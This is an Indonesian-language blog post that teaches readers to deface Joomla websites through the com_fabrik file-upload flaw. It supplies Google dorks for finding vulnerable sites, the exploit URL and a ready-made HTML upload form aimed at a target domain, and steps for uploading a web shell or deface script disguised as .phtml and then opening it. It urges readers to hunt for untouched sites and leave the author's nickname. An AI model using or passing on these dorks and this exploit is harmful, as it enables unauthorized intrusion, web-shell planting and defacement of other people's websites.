Hello Guys..Kali ini saya akan memberitahukanDeface method com_fabrik sama csrf Nih gua buat yg belum tau/belum bisa aj. Yang udah bisa tolong ajari yg belum bisa. Ilmu jangan disimpen sendiri asuu:vBAHAN-BAHAN NA TOD :v-DORK: inurl:/com_fabrik site:inurl:viewTable?cid= site:inurl:index.php/component/fabrik/ site:inurl:index.php?option=com_fabrik&view= site:inurl:index.php?option=com_fabrik site: (untuk site nya bisa klean tambahin sendiri)-EXPLOIT: /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload<form method="POST" action="http://site.co.il/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data"> <input type="file" name="file" /> <button> Upload </button></form>LANGKAH-LANGKAH NYA PAK1. Klean dorking seperti biasanya, (dork ada di atas cok)2. Lalu buat tes vuln nya kalian tambahin exploitnya. (Exploitnya juga ada diatas cok) Jadinya gini..https://LINK TARGET.co.li /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload3.Kalo vuln maka akan muncul tulisan : {"filepath":null,"uri":null}4. Sekarang kalian edit CSRFnya di notepad/text editor, kalian salin target kalian..ganti di bagian action="LINK TARGET/(exploitnya)"5. Kalo sudah kalian save, buka CSRF di google, nanti akan muncul tombol upload.6. Lalu kalian upload shell kalian / script deface kalian.. ( jika shellnya .php ubah dulu ke .phtml)7. Jika berhasil terupload akan muncul tulisan {"filepath":\/bla bla bla:v "htpps://Target klean.coli/ shell atau sc klean}Pokoknya muncul gituan dh.8. Lalu kalian buka dh Http://Link Target.coli/Nama Script Lu.phtmlDh sekarang tinggal eue tuh web, tapi ingat. Saat dorking dibutuhkan "KESABARAN COOK" kalian tinggal kembangin sendiri Biar Ketemu Yang Masih Perawan:vJangan lupa gua titip nick aokwowkowk Locked,- hahahaha:p Maaf yah kalo masih belum ngerti:v maklum baru bikin blog;vSee you next time:)

0 Komentar